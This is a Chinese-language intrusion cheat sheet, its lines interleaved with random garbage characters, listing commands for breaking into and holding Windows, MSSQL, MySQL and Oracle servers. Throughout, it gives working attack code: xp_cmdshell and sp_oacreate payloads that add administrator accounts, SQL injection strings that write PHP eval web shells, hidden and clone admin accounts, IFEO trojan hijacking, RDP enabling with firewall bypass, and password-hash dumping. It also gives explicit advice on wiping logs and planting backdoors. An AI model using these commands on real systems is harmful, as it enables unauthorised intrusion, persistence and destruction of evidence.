- W! C: j& L B1.net user administrator /passwordreq:no& f/ J' @( @3 r5 i+ k% B" w
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了. r9 @1 @% g- c+ W/ C+ P
2.比较巧妙的建克隆号的步骤
) A. m7 T2 m0 i! `先建一个user的用户
* C" @" l9 p" e. s$ F8 T4 p然后导出注册表。然后在计算机管理里删掉* C2 P [* N7 E d4 W! u" a1 h, F
在导入,在添加为管理员组
: I$ D; f8 r! i: Q8 Q+ F3.查radmin密码' m5 t8 N+ ^4 K5 b1 J8 G% \
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 G, C6 i; M0 {+ B
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
3 m7 ?. {$ {7 ]6 c建立一个"services.exe"的项
% [$ L, w0 |; C: Y% e0 A再在其下面建立(字符串值)
* w/ p3 `2 G- v! C键值为mu ma的全路径
0 L& r% v1 c% t8 q) j/ K! I5.runas /user:guest cmd
% r* i) B. i. x- R4 U: U4 ~测试用户权限!
- ~$ h# X5 Z/ @! `6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?6 {( h, U, O1 ?& S
7.入侵后漏洞修补、痕迹清理,后门置放:7 y9 S3 O$ ?$ U$ Q# G. L' Q+ j
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
1 C* j, k) Y( b5 `8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c2 F2 |, B. n0 e- C0 A5 R
' D G2 D+ t1 f, [
for example
8 P# f- d% z! M$ l/ u# F+ X# ` L2 d1 a2 g+ ?* Y3 O0 E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add' L" ]' b6 X1 p x' z+ o/ j* r2 S
8 ^& ^. }$ H6 l9 g" q7 kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add' q4 I; F5 |: X6 q* V
% K* d8 x2 x$ o! N d; d. s* L
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
, i" a9 @- F V/ D如果要启用的话就必须把他加到高级用户模式
" H2 l L& ^8 Y# x) @: _& e可以直接在注入点那里直接注入
: T1 M$ s; {1 v! z. J& Wid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--1 D+ i/ P9 s& p0 H; x: |+ i N
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--! N# p% k' H* d
或者
+ y! k% |8 I- J/ [9 W& F2 vsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% C L& ?) s, ]来恢复cmdshell。3 m, G, w6 P7 u- d
- _5 }3 \ L; D. d' H, q# e
分析器
1 k" W" P ?- ?. ~, a0 zEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--2 Y7 U- U" a, V K6 `/ Y/ Z) b4 K$ W
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
; U/ M" n p' m" U: O1 x10.xp_cmdshell新的恢复办法1 E# a# N+ q1 ~ D5 I" r4 I1 U
xp_cmdshell新的恢复办法
: m B& n) r" a: t2 Y* z; H扩展储存过程被删除以后可以有很简单的办法恢复:! k8 N! M" M" C/ |4 W$ b6 e3 q
删除
9 @9 J+ V6 U2 _0 d A3 Gdrop procedure sp_addextendedproc
# f1 \9 B, Q6 v/ ~1 Q7 v* s8 bdrop procedure sp_oacreate
4 n2 `! X, _$ R0 t- W0 P" nexec sp_dropextendedproc 'xp_cmdshell'
6 n( E8 A; Y7 K2 }: }+ V
/ @2 w9 Q+ B" Y3 S+ d8 V恢复" Z! T% w7 y5 m# e/ v/ U: S9 V
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
, C! p! F+ t6 R0 F: C! `% }" X& jdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
# c4 q% M! |9 }2 V0 N8 x7 l# v1 v; e; I
这样可以直接恢复,不用去管sp_addextendedproc是不是存在4 Y5 p4 f6 C; k# `
7 S u; M$ w+ {. v6 k/ e* Y* T" S-----------------------------9 @* t/ X5 N# N' b% |" l
2 i9 G A2 {7 [, h
删除扩展存储过过程xp_cmdshell的语句:
/ w3 v3 `% G# _exec sp_dropextendedproc 'xp_cmdshell': V: H3 u$ t7 w" t
8 t0 k, U# P9 R( a$ h0 |恢复cmdshell的sql语句* q& l0 v/ \- T9 G6 A
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ j4 r9 W( @4 r8 Q' Y0 Y9 R
& W* j# l! v# c. A/ r' ?: o3 i
, E0 F$ c( U3 P开启cmdshell的sql语句, }& T% @& ~3 n% n2 O; D
# q4 f8 W/ f1 _* w% y) Gexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
; c! K6 i7 D2 ~" ]1 W! I' a
% j5 O! Z+ d# F f/ X1 [, P5 [/ U9 [判断存储扩展是否存在
+ x# Q' M# P4 q$ {* X/ Eselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'2 A8 }" m5 P! \
返回结果为1就ok. `) t3 C" K) [1 W7 ?7 f) p& u9 x
7 E: r; ~: }6 N0 ~! N, E& i; S恢复xp_cmdshell
2 L i' s: Z% a3 [3 G7 M, M8 Cexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( v3 Z. f0 q& c r4 F- O
返回结果为1就ok
/ l% j3 M2 }# ^6 a$ c+ c \* A: C0 i$ R, g4 R! ^6 e
否则上传xplog7.0.dll
7 G) q7 f4 g; hexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; A T4 T0 Q! z) d
$ m/ v7 A, j$ Z. T
堵上cmdshell的sql语句
1 b" H( W! k- m2 f8 ~8 Rsp_dropextendedproc "xp_cmdshel
, w4 E2 [2 s* W6 s-------------------------
8 M* g$ \7 q' D7 D清除3389的登录记录用一条系统自带的命令:3 O6 J4 z! G$ r, Y; z, d4 ]
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f% z8 \) g; F) n8 K
& _: n+ A& Z' n2 u. D* k然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
6 I& V: T0 E4 o6 X2 A* j在 mysql里查看当前用户的权限
5 G) S1 |* h: Y6 B' ]3 j! dshow grants for
" z9 z' J! _7 c( q0 h, A. s C+ p0 G! N
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。% C1 Z" _% t! S6 ]
8 f5 P. c# Q2 L' h4 S) E
$ s/ H+ d9 ]6 L' k p5 g( uCreate USER 'itpro'@'%' IDENTIFIED BY '123';* L: [4 m' v g+ V+ n2 O9 P! r4 S
% X X C0 B$ HGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
6 {2 Q4 W; u4 G4 M* q7 C+ e
; D* T o' k6 v# W- B* rMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. W/ o. ^( }: X1 ^- y& E# y' h
) a, Q$ i9 @+ p5 R
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. n1 W* `' y+ s" ]( \8 |& Y) g6 I8 P9 E
搞完事记得删除脚印哟。9 x( P4 T% u; S7 d& b$ a7 n8 D* v
7 c ^: b" P$ H
Drop USER 'itpro'@'%';! n, M8 l% j! {7 u
. |2 @! r( ^1 ]# x$ p
Drop DATABASE IF EXISTS `itpro` ;7 u- t. }) K. z5 Q/ N
c) x6 Y) o% R" F4 ^" y% w
当前用户获取system权限5 r6 P6 {+ Z+ J( _4 z: T. b& Q
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
: M* G! a @$ t1 o; R# qsc start SuperCMD) l/ w6 I! F5 @: e; s2 T0 J8 X; \
程序代码
% q7 B1 ^& y' N7 O, D<SCRIPT LANGUAGE="VBScript">' }, j& o" s8 L* v2 S7 q; s
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
0 L: \! a9 ]. k/ t7 o* ~os="WinNT://"&wsnetwork.ComputerName" q, ]" g" I4 M2 V- g
Set ob=GetObject(os), j0 T1 q2 E& ]4 h+ M
Set oe=GetObject(os&"/Administrators,group")/ t( Q0 p5 _! x( P0 b1 B
Set od=ob.Create("user","nosec")% a/ U0 G9 T* L' T3 h/ \
od.SetPassword "123456abc!@#"' | j2 O- W5 [
od.SetInfo
! H0 t1 K7 E4 ?& k( p8 |" WSet of=GetObject(os&"/nosec",user)
4 z9 _5 I5 b" N8 t$ F/ n- A! d/ Ioe.add os&"/nosec". R- g* v' ]* |3 q! F) ?$ u$ `: d
</Script>+ C% F' t4 s1 w" K
<script language=javascript>window.close();</script>
h, Z. e; c/ f" ?' G& S& F: G
- O9 P1 C2 `8 T2 Q' w
/ p! f) k8 R5 s2 \+ A
8 r. ?* c. N, N2 v7 \% N
& o' V' I u+ A# H1 k8 I, `突破验证码限制入后台拿shell
& R, N, @% E& P& n- M! w5 l程序代码
# X, I% N: F9 j( wREGEDIT4 + Z* t5 b2 I: r# ]$ ^3 ?( X- D, B$ u
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 7 @' o0 P/ L0 C) ^; G; g
"BlockXBM"=dword:00000000
: `6 n/ _4 X* ^6 |, i6 w) l* H
* T' j6 E6 ?" o! y保存为code.reg,导入注册表,重器IE
1 B8 g8 O5 L" w2 {* G就可以了
8 F e) l% K- runion写马2 i5 r1 }. ~) T3 G8 b" I, u3 \
程序代码
( h$ F; g1 ]( z; Jwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*5 ~: o0 V5 d; V, g6 j3 [
* g6 ^; M. }5 f# w2 W* k2 K7 J
应用在dedecms注射漏洞上,无后台写马
3 R& ^" c% z* D4 ^ Sdedecms后台,无文件管理器,没有outfile权限的时候
# } F* R8 x/ @4 h在插件管理-病毒扫描里! e/ T! [* k+ k& D1 Z @
写一句话进include/config_hand.php里+ \- ~& M/ t6 ~
程序代码$ |; a/ [9 _* }( n3 F& S1 k. M
>';?><?php @eval($_POST[cmd]);?>4 n2 L, Z4 Y( ~9 L. U
: L* ?% j" U9 I- g% _( Q% l
) c f' c ^' c" c; f
如上格式0 j" J. G( K) }% e0 t- [4 `. o
# d# q3 Z% c. G% a; z3 w
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解9 t8 ^* ^# k5 [, T* @
程序代码- N- o1 o" m8 H) b w
select username,password from dba_users;
1 `6 m0 \& S m; [8 Y5 R' y3 a3 W- m$ T6 K4 j
: R2 a# f0 h$ t1 _! y8 P8 |mysql远程连接用户
. o, v" w n' W程序代码+ C1 X4 Q5 o g
/ o& n$ D8 O' K% ^Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';( f+ K T2 n0 M" K
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION T$ E+ b/ Y" G2 A: w* u. I) K
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* G2 c! q$ Y5 U5 ~# l$ T5 ~" Y
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
* A/ }8 t( b7 i( J( K7 L" F
+ z6 _7 ~* d/ [( s% a' F
6 M9 h( s+ B0 W e& v- L4 p
5 b* Y7 t+ X- T! u
/ f1 s1 F2 ]% _6 J9 Aecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0, u4 {- U+ r/ e- U( r& T8 j. L4 x
# i: O0 t: x9 d6 T% e; q
1.查询终端端口
: [7 w, t: S& g5 d5 W$ w0 a% }5 w" r) E% X( o5 N) d0 ]$ m
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
. X( D& @4 Z3 c2 l0 Y
4 E: N& ^+ q4 z; h2 @$ M' C通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"9 e0 M3 k/ [6 c
type tsp.reg, Q- e' L* ~" L
# o4 u. b! x! _2 G
2.开启XP&2003终端服务
# z" P& _6 X# Z
( |- N- Y: s, v6 ]' y& H+ T$ ^/ f* l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f/ r! Y# C5 X. {& N" @4 n
" q; M" f( K; A C' l
. J, ] ?6 W2 u4 L* Q
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f4 w- y% ?1 c! c9 s
: ~3 t' p# M, ~! n+ r+ z8 b9 m" j3.更改终端端口为20008(0x4E28)
- \( Y. o. [2 {+ V
" e$ p( @. D* H; k/ N+ h; n S WREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' u! |5 f: T5 o2 @- X3 Q
' l) }$ n! n0 u- C1 \& yREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 S7 z: q$ ~7 \% r& O
; b. a8 m7 h; V9 [8 e& Y- I4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制. @9 ~6 _- e' z! { g
; ]: C4 X7 [( D& UREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
: a! k" o+ D% N+ D; D, `* | e/ W# n; X" I
/ ^2 z# y% S" {$ @; N4 P r
5.开启Win2000的终端,端口为3389(需重启)4 B8 C. a8 [: ?6 ]$ c4 u/ L. g
0 \" I" `2 `$ `" k; \
echo Windows Registry Editor Version 5.00 >2000.reg & \- A) p& {3 ?" v( K8 {# \" F
echo. >>2000.reg
) C/ M& @- C. e! J$ `& Y/ ~echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( y/ Q) ]) }5 ?, A0 q4 P
echo "Enabled"="0" >>2000.reg
* h3 z3 h( v% V' e% r' hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
0 p6 F$ L0 ^. ^- h Qecho "ShutdownWithoutLogon"="0" >>2000.reg
* t. K% e) p" Z+ @( s* z& A6 Aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
% {! L+ X' e$ s* Gecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg $ w6 ]0 V# m" z% k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
+ o6 O) q6 ~2 t% u' T }echo "TSEnabled"=dword:00000001 >>2000.reg 3 K2 Z# J |& y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
' C5 ^/ @5 t8 k* @; a$ h+ I, f3 qecho "Start"=dword:00000002 >>2000.reg
* m6 W5 i7 E5 h$ f7 Q/ Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 9 @: T- W6 U! R0 w6 |
echo "Start"=dword:00000002 >>2000.reg # P" g2 H# {* L. f2 z- r: w
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 B# r5 u7 T- N2 o6 {
echo "Hotkey"="1" >>2000.reg \- y% n$ f. M4 p% m$ j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
r+ F Q; e7 q# v# _6 V4 \echo "ortNumber"=dword:00000D3D >>2000.reg 2 Y% E8 C" h7 a+ j, Y6 |+ R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 6 |4 d' I( h' P1 [$ ] x
echo "ortNumber"=dword:00000D3D >>2000.reg9 F) h6 g+ |, ]3 @9 j0 D& h6 W5 R
! [9 e0 m" |8 O1 {- I
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)/ G. }, B; P/ J" U6 C* ^
q( h/ b: v9 M6 H# l5 N$ X
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf: d1 V3 l5 Q& L8 H! E
(set inf=InstallHinfSection DefaultInstall)6 j$ E5 ^* z( l+ C6 c
echo signature=$chicago$ >> restart.inf2 |8 |9 `2 a. C
echo [defaultinstall] >> restart.inf
/ X% x, s2 o' Q L4 h, ~0 `% }: jrundll32 setupapi,%inf% 1 %temp%\restart.inf4 k) F$ x7 Q% ^9 d f' d0 n
, g6 Z5 K. E' I
V! @0 T: I1 p B1 ]$ T: T3 z7.禁用TCP/IP端口筛选 (需重启); ?# ^1 J* g5 m8 l1 n4 D
! F* E7 E2 E t1 ], z; CREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f- ^4 E/ f! N R2 `1 I. u6 W
" _, H J( X6 n7 }! ?
8.终端超出最大连接数时可用下面的命令来连接
5 V9 k7 a! x# |7 R; S
/ C8 ?1 {: ^0 H+ I5 j. Bmstsc /v:ip:3389 /console
* u8 e7 H0 v9 c/ z: A9 A" \% k! T; Q5 C# L$ V4 h
9.调整NTFS分区权限1 w/ D. @. N3 z3 q
: L( s0 W. u$ L& v ?cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), P6 t9 N% L' K7 T9 U ~
# i+ M4 C: W4 Y8 O/ H, B( lcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
1 b d- ~$ C7 c" Y" ^ J5 k
! h0 U7 s% O( d1 A------------------------------------------------------
& R/ r* {6 d9 C1 U: R, s5 j8 [3389.vbs
% ?$ e5 p3 P0 u( E" W/ L8 _2 TOn Error Resume Next7 Y9 }1 n/ {# ~7 l e) J
const HKEY_LOCAL_MACHINE = &H80000002' }2 _' ^! T& U
strComputer = "."+ S4 R% O" D! O# J: X( s
Set StdOut = WScript.StdOut
8 x" C d9 C0 a( T+ V' sSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
0 G3 C7 W Z. v. w; I8 pstrComputer & "\root\default:StdRegProv")" T% |0 B0 g4 ~. e9 a1 n; o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server": S7 e2 H% b( w7 U
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 O8 h7 K' Y6 [" K- ?9 V1 V
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
' K9 g' p4 K! }4 C* Z# [' q. ~oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# n5 s4 L% x2 ~: t+ z2 [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 ]0 [; Y+ X) \: m, Q: Z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ f$ s7 o, G" \) l! y( C+ gstrValueName = "fDenyTSConnections". f. d1 ?0 ]. J& ?
dwValue = 0% F! [* s" `) X; u; ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue F" w. n- X2 M5 Y) d* d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
) u8 l, q; f% I( E3 j0 U2 s+ gstrValueName = "ortNumber": d: p t' w, [6 n8 T$ b
dwValue = 33899 z6 o& f# i' E1 z3 O, J8 a
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: V, V' y j+ y5 X7 R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"# I4 K. x7 X3 Y+ U5 b' V9 O
strValueName = "ortNumber"6 t+ s/ G3 \2 j( ], N; P
dwValue = 3389
; H$ h! S3 t# r. _; Q6 L; T$ soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
: H7 h; ]; I+ B' h! PSet R = CreateObject("WScript.Shell") 9 x( b* U$ ~( E. k
R.run("Shutdown.exe -f -r -t 0")
, J7 A0 v# _1 t- L( W: A6 b/ m, x, W' O8 E
删除awgina.dll的注册表键值' |, x0 G, U: h+ j' z* m
程序代码1 K1 I K$ h: E& y9 [4 w; v
( m1 b6 `- x$ H6 L, Y( `reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
7 x& ]2 L7 A% n5 \1 @! @' ]/ E3 q" S/ s& H6 e$ r8 _+ }/ e( i% D5 R; D$ G
7 ~6 H* j1 Z, v4 Z* w5 c
" Y7 w7 Y% p7 u0 s4 R* p# G8 S) T5 i8 c, v
程序代码$ |* ?0 c# N* f; _
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
/ o. d& l( q: K+ S2 j& r3 F1 q9 a" V# f4 a
设置为1,关闭LM Hash
3 a* O& t' L5 Z9 ^/ x8 [: i
p% e8 a/ U8 ]' |4 x数据库安全:入侵Oracle数据库常用操作命令1 d: b( u" }" ~0 j! ?1 e6 _
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
& Z ^2 A e- \0 e1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
2 {/ a/ J! o9 i5 S7 Y6 I% ? U2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
% w2 p5 f# y* R3、SQL>connect / as sysdba ;(as sysoper)或
; W; y# S' |3 }5 ?' g* O* @% Mconnect internal/oracle AS SYSDBA ;(scott/tiger)+ o3 l$ v. g& {' n& j, o
conn sys/change_on_install as sysdba;3 z2 Q" r( l! S9 u
4、SQL>startup; 启动数据库实例1 s" E) x% L- G/ e+ O
5、查看当前的所有数据库: select * from v$database;5 t. d3 ?" _3 R& U# O
select name from v$database;
V- k6 E& L/ L i6、desc v$databases; 查看数据库结构字段 A7 j3 W) k3 A8 l, |8 B- D
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
# o0 c( Z, _; E6 W, \9 E bSQL>select * from V_$PWFILE_USERS; s6 _3 U) ]' ^6 w( t3 O
Show user;查看当前数据库连接用户
@! |8 V" g* G8、进入test数据库:database test;
" `& M7 T5 O+ a# R9 s Z9、查看所有的数据库实例:select * from v$instance;# V; d' Z9 B' p1 n6 M
如:ora9i) r* Z2 Z0 Y+ E8 l
10、查看当前库的所有数据表:. n( o! L2 w+ T! {. q, v) }
SQL> select TABLE_NAME from all_tables;0 D7 n, x$ G8 a. Q+ b- I
select * from all_tables;
3 {# I" t6 ?0 ?! ^) O5 jSQL> select table_name from all_tables where table_name like '%u%';" }( Y/ F( p- T
TABLE_NAME
, _- s+ Z |, F6 ^------------------------------
_8 \& ~6 S |* {+ C9 h_default_auditing_options_
, i! D# ]+ b. `9 `" q11、查看表结构:desc all_tables; j, {/ D( F3 ]( m- q( G# A7 Q; N
12、显示CQI.T_BBS_XUSER的所有字段结构:
( d' t! m0 E3 jdesc CQI.T_BBS_XUSER;2 A- u/ x3 @) Q3 F* ^: p, b
13、获得CQI.T_BBS_XUSER表中的记录:
4 k3 w. L, [, O9 q+ M* i5 W& hselect * from CQI.T_BBS_XUSER;
1 o! m! h7 {- P14、增加数据库用户:(test11/test)& x& R8 I4 b$ ~5 m" T6 b9 |
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;; v; X Z+ |/ P
15、用户授权:5 K, E. Z9 O. N; ~3 t
grant connect,resource,dba to test11;
3 A) c& \4 y+ Z1 Tgrant sysdba to test11;1 Q. `& `/ R! d
commit;" v, c% U! `. }1 _, V
16、更改数据库用户的密码:(将sys与system的密码改为test.)- D( ~# X% R0 T
alter user sys indentified by test;( D: d7 r- k. r$ A/ Q6 v
alter user system indentified by test;
3 N( O; o. ^# A( d( u7 H/ F. e+ l2 T6 R
applicationContext-util.xml
% H- B) F- @2 B! G$ RapplicationContext.xml3 `, s2 W V7 C7 F+ u
struts-config.xml
" x% w8 z) i/ B1 Q& ^( p, Xweb.xml6 K9 I0 ?0 u% g# X, s* ~
server.xml
+ D2 l. C3 U/ L" {! atomcat-users.xml. ]* S3 S2 k$ B: U6 k) Z
hibernate.cfg.xml
' f% Z" B7 y0 @ G. a8 B$ |5 ^8 pdatabase_pool_config.xml
6 @2 c, X8 h, } c% r6 t
$ T/ ]4 B0 ]3 C7 j4 Z1 Z- o8 w7 `1 F; ?3 ]7 z
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置. g; I2 ?7 S& e
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
( x' I. I X3 B# j8 p N\WEB-INF\struts-config.xml 文件目录结构
2 m* h( Z/ e- y+ }8 B! t; @7 q1 L$ v7 M4 b3 P$ G' d
spring.properties 里边包含hibernate.cfg.xml的名称
8 l7 b5 R/ i0 r( o- k
6 p- d( l: R3 B
- W1 c2 u% k! R/ z! Z M1 v% _) vC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: |; |# r" o6 E8 M# i
* R: u3 U; l$ K如果都找不到 那就看看class文件吧。。
& h& q( ^ C k* \; A6 z6 w/ J, x. D, j
测试1:6 G8 j# [2 v3 ?
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
; k& l" M$ v: m( N- s6 b( b6 U4 h! i) R6 p2 v g8 Z
测试2:# Y3 ]- X" d+ [; \# W; b0 a
u% x! }9 z4 O" g3 A& lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
; b2 b3 e- @9 d- b$ e
& I$ I4 A& e# H1 h) b6 c( S' G# ldelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--: ]$ b ?% A2 G. F: I' U
# r/ z$ w9 B( j# K% E( ?# p
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ q" T4 P8 g/ \# p: u; F
2 W$ u6 F) P- y: B+ P查看虚拟机中的共享文件:
) e: ^# J5 D8 @5 {/ F在虚拟机中的cmd中执行# n4 }4 t- e% U
\\.host\Shared Folders, l& L- a4 \& T9 U
, r, X7 k/ m2 _% |; w( F2 t& E; {
cmdshell下找终端的技巧
' L3 H3 C* g. o! w* f找终端: ! p7 j1 e- L3 w+ B6 g; L
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
. B$ [ _" R, i! x6 z 而终端所对应的服务名为:TermService * M) l& _2 w2 \. T3 J
第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 `$ T6 B3 m* {$ `0 [$ ~2 w 找到PID值所对应的端口
: }5 p, `) [0 Y7 _( x
2 A: L$ U6 @ g# i6 x查询sql server 2005中的密码hash3 [, }5 L9 u- E% s! `, ]2 D Z
SELECT password_hash FROM sys.sql_logins where name='sa'
) \( e" K* v( R) QSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ ?8 }2 ]9 j1 p$ M+ o! faccess中导出shell' C: {0 ^3 M' l/ W+ p
) ^8 z) y6 w8 e- ?中文版本操作系统中针对mysql添加用户完整代码:
; b: E+ a3 {7 t( ]! A' M7 P* n/ y0 R$ Q7 P+ X. m
use test;
! f& Q, T- B1 e$ xcreate table a (cmd text);
